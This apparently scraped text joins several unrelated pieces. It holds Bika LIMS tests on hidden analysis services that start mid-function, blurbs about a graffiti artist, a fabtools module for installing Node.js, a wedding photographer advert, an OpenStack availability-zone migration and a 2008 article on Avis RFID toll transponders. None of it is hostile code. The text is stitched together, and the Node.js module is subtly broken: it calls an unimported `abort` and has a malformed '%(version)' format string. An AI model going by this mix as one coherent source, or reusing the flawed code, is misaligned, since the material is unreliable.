# Modify visibility for Cooper in profile
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in profile
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
def test_service_hidden_artemplate(self):
# Template
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in template
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Cooper in template
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in template
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_service_hidden_analysisrequest(self):
# Input results
# Client: Happy Hills
# SampleType: Apple Pulp
# Contact: Rita Mohale
# Analyses: [Calcium, Copper, Iron]
client = self.portal.clients['client-1']
sampletype = self.portal.bika_setup.bika_sampletypes['sampletype-1']
request = {}
services = [s.UID() for s in self.services]
values = {'Client': client.UID(),
'Contact': client.getContacts()[0].UID(),
'SamplingDate': '2015-01-01',
'SampleType': sampletype.UID()}
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.isAnalysisServiceHidden(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.isAnalysisServiceHidden(services[1]))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
self.assertTrue(ar.isAnalysisServiceHidden(services[2]))
# For Calcium (unset)
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in AR
uid = self.services[0].UID();
sets = [{'uid': uid}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
ar.setAnalysisServicesSettings(sets)
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
ar.setAnalysisServicesSettings([])
# AR with profile with no changes
values['Profiles'] = self.analysisprofile.UID()
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with template with no changes
values['Template'] = self.artemplate
del values['Profiles']
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with profile, with changes
values['Profiles'] = self.analysisprofile.UID()
del values['Template']
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.analysisprofile.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
# AR with template, with changes
values['Template'] = self.artemplate.UID()
del values['Profiles']
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.artemplate.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
# testing tests
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestHiddenAnalyses))
suite.layer = BIKA_FUNCTIONAL_TESTING
return suite
|
Toronto based graffiti artist Kwest recently made his way out to the Belle Province to paint a massive new piece on the streets of Montreal. With no projectors or assistants, the piece took 30 cans and 10 gallons of bucket paint and was done in just 30 hours.
We recently posted up some photos of our man Kwest creating a massive new installation for the Container Yard in downtown Los Angeles. Here we have a short new video filmed and edited by: J Strickland of the man at work. Peep the vid below!
Toronto graffiti legend Kwest teamed up with Jordan to make an incredible installation for the Jumpman pop up store in Toronto. On display over this past All Star weekend, Kwest dissected a number of sneakers to create a new wall hanging sculpture that resembles a bird spreading its wings.
Canadian graffiti artist Kwest, visited Roskilde Festival 2015 to build the World’s biggest graffiti letter sculpture. Check out the process of creating this monumental piece and see the amazing result he produced for the festival-goers to enjoy during #RF15.
|
"""
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note: the ``simplejson`` module is required on Python 2.5
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
try:
import json
except ImportError:
import simplejson as json
from fabric.api import cd, hide, run, settings
from fabtools.system import cpus, distrib_family
from fabtools.utils import run_as_root
DEFAULT_VERSION = '0.10.13'
def install_from_source(version=DEFAULT_VERSION, checkinstall=False, dist_num=None):
"""
Install Node JS from source.
If *checkinstall* is ``True``, a distribution package will be built.
set dist_num to set make -j value
::
import fabtools
# Install Node.js
fabtools.nodejs.install_nodejs()
.. note:: This function may not work for old versions of Node.js.
"""
from fabtools.require.deb import packages as require_deb_packages
from fabtools.require.rpm import packages as require_rpm_packages
from fabtools.require import file as require_file
family = distrib_family()
if family == 'debian':
packages = [
'build-essential',
'libssl-dev',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_deb_packages(packages)
elif family == 'redhat':
packages = [
'gcc',
'gcc-c++',
'make',
'openssl-devel',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_rpm_packages(packages)
filename = 'node-v%s.tar.gz' % version
foldername = filename[0:-7]
require_file(url='http://nodejs.org/dist/v%(version)s/%(filename)s' % {
'version': version,
'filename': filename,
})
run('tar -xzf %s' % filename)
cpus_num = None
if dist_num:
if dist_num > 0:
cpus_num = dist_num
else:
abort("dist_num should be positive")
else:
cpus_num = cpus() + 1
if cpus_num:
with cd(foldername):
run('./configure')
run('make -j%d' % cpus_num)
if checkinstall:
run_as_root('checkinstall -y --pkgname=nodejs --pkgversion=%(version) '
'--showinstall=no make install' % locals())
else:
run_as_root('make install')
run('rm -rf %(filename)s %(foldername)s' % locals())
def version(node='node'):
"""
Get the version of Node.js currently installed.
Returns ``None`` if it is not installed.
"""
with settings(hide('running', 'stdout', 'warnings'), warn_only=True):
res = run('%(node)s --version' % locals())
if res.failed:
return None
else:
return res[1:]
def install_package(package, version=None, local=False, npm='npm'):
"""
Install a Node.js package.
If *local* is ``True``, the package will be installed locally.
::
import fabtools
# Install package globally
fabtools.nodejs.install_package('express')
# Install package locally
fabtools.nodejs.install_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s install -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s install -g %(package)s' % locals())
def install_dependencies(npm='npm'):
"""
Install Node.js package dependencies.
This function calls ``npm install``, which will locally install all
packages specified as dependencies in the ``package.json`` file
found in the current directory.
::
from fabric.api import cd
from fabtools import nodejs
with cd('/path/to/nodejsapp/'):
nodejs.install_dependencies()
"""
run('%(npm)s install' % locals())
def package_version(package, local=False, npm='npm'):
"""
Get the installed version of a Node.js package.
Returns ``None``is the package is not installed. If *local* is
``True``, returns the version of the locally installed package.
"""
options = ['--json true', '--silent']
if local:
options.append('-l')
else:
options.append('-g')
options = ' '.join(options)
with hide('running', 'stdout'):
res = run('%(npm)s list %(options)s' % locals())
dependencies = json.loads(res).get('dependencies', {})
pkg_data = dependencies.get(package)
if pkg_data:
return pkg_data['version']
else:
return None
def update_package(package, local=False, npm='npm'):
"""
Update a Node.js package.
If *local* is ``True``, the package will be updated locally.
"""
if local:
run('%(npm)s update -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s update -g %(package)s' % locals())
def uninstall_package(package, version=None, local=False, npm='npm'):
"""
Uninstall a Node.js package.
If *local* is ``True``, the package will be uninstalled locally.
::
import fabtools
# Uninstall package globally
fabtools.nodejs.uninstall_package('express')
# Uninstall package locally
fabtools.nodejs.uninstall_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s uninstall -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s uninstall -g %(package)s' % locals())
|
As a member of the SWPP and with over 10 years experience in wedding and portrait photography. Sead Kahrimanovic offers professional wedding and portrait photographic services in Perth and all over Scotland. We have photographed in various wedding venues in Perthshire, Dundee, Edinburgh, Glasgow and Aberdeen just to name a few.
We offer creative, modern and relaxed wedding and portrait photography, if you are looking for a fun and creative photographer please get in touch for a chat.
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregates = Table('aggregates', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
# migrate data
record_list = list(services.select().execute())
for rec in record_list:
# Only need to migrate nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
# if zone doesn't exist create
result = aggregate_metadata.select().where(
aggregate_metadata.c.key == 'availability_zone').where(
aggregate_metadata.c.value == rec['availability_zone']).execute()
result = [r for r in result]
if len(result) > 0:
agg_id = result[0].aggregate_id
else:
agg = aggregates.insert()
result = agg.execute({'name': rec['availability_zone']})
agg_id = result.inserted_primary_key[0]
row = aggregate_metadata.insert()
row.execute({'created_at': rec['created_at'],
'updated_at': rec['updated_at'],
'deleted_at': rec['deleted_at'],
'deleted': rec['deleted'],
'key': 'availability_zone',
'value': rec['availability_zone'],
'aggregate_id': agg_id,
})
# add host to zone
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
num_hosts = agg_hosts.count().where(
agg_hosts.c.host == rec['host']).where(
agg_hosts.c.aggregate_id == agg_id).execute().scalar()
if num_hosts == 0:
agg_hosts.insert().execute({'host': rec['host'],
'aggregate_id': agg_id})
services.drop_column('availability_zone')
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
availability_zone = Column('availability_zone', String(255),
default='nova')
services.create_column(availability_zone)
# Migrate data back
# NOTE(jhesketh): This needs to be done with individual inserts as multiple
# results in an update sub-query do not work with MySQL. See bug/1207309.
record_list = list(services.select().execute())
for rec in record_list:
# Only need to update nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
result = select([aggregate_metadata.c.value],
from_obj=aggregate_metadata.join(
agg_hosts,
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
)
).where(
aggregate_metadata.c.key == 'availability_zone'
).where(
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
).where(
agg_hosts.c.host == rec['host']
)
services.update().values(
availability_zone=list(result.execute())[0][0]
).where(
services.c.id == rec['id']
)
|
The car and truck rental agency would be the first to install TransCore's eZGo Anywhere transponders, which are interoperable with most toll-collection systems.
Dec 23, 2008—Car rental company Avis Budget Group is collaborating with the Highway Toll Administration (HTA), an electronic toll-payment service provider, and RFID technology firm TransCore to begin the deployment of TransCore's eZGo Anywhere RFID transponders in 2009. The transponders will enable customers to pass through toll plazas throughout much of the United States, and be billed at a later date.
According to TransCore, eZGo Anywhere is the first active RFID tag capable of working with nearly all tollway RFID readers around the country, including E-ZPass in the Northeast, Texas' TxTag and Florida's SunPass. The car rental firm—which already provides local electronic toll devices for some of its Avis Rent A Car, Budget Rent A Car and Budget Truck Rental vehicles—intends to have the system in operation at the end of the second quarter of 2009, says Michael Caron, Avis Budget Group's VP of product and program development, as long as the various local toll authorities sign on to the project.
With more than 350,000 vehicles on the road nationwide, Avis Budget Group is the largest car and truck rental company in the United States. For the past three years, it has provided many cars with RFID transponders attached to their windshields that pay tolls at local tollbooths. As a customer pays for a car rental, he or she can also sign up for the eToll system, at a cost of $1.50 per day. With the service, the user provides a credit card number that is then linked to the unique ID number on the car's transponder, and directed to HTA. Each time the user passes through a local tollbooth, the ID number is captured and forwarded to HTA, which then bills that person's credit card company directly.
The eToll system has been well received by Avis Budget Group's customers, Caron says, with more than 50,000 cars equipped with E-ZPass transponders for the Northeast alone, and with 9 million toll events recorded since the company introduced the service in the spring of 2006. However, he notes, the system has shortcomings that the eZGo Anywhere tag would resolve. The various eToll transponders are not interoperable, he explains. At present, E-ZPass is accepted only in Delaware, Illinois, Indiana, Massachusetts, Maryland, Maine, New Hampshire, New Jersey, New York, Pennsylvania, Virginia and West Virginia. So if a vehicle were rented in an E-ZPass state, its transponder would be useless in other regions.
That puts limitations on both customers and Avis Budget, Caron says, since not only is a user confined to eToll payments in a particular region, but the vehicle's eToll tag can not be used by a new driver in another location. In the case of a truck rented in Texas and returned in New England, for instance, Avis Budget would need to change the transponder to an E-ZPass version before the next rental of that vehicle.
In September 2008, TransCore, an RFID and vehicle-tracking product company located in Harrisburg, Pa., debuted its multiprotocol transponder (see RFID News Roundup: TransCore Unveils Tag Designed for Most Toll-Collection Systems). TransCore provides RFID transponders for local agencies, such as Florida's Turnpike Enterprise (FTE), which created the SunPass toll-collection system. The company already had a background in toll-collection RFID technology, says Kelly Gravelle, TransCore's chief technical officer, and had been developing the eZGo Anywhere transponder for approximately a year. The active RFID tag, which operates at 902-928 MHz, has a non-replaceable battery with a life of about 10 years.
The transponder is capable of operating in read-write mode and adjusting its characteristics to meet the protocol needs of each tollway region. For example, in a region in which—for security purposes—the interrogator sends an authentication command, the transponder is capable of receiving that transmission and responding with the appropriate code to verify its authenticity.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.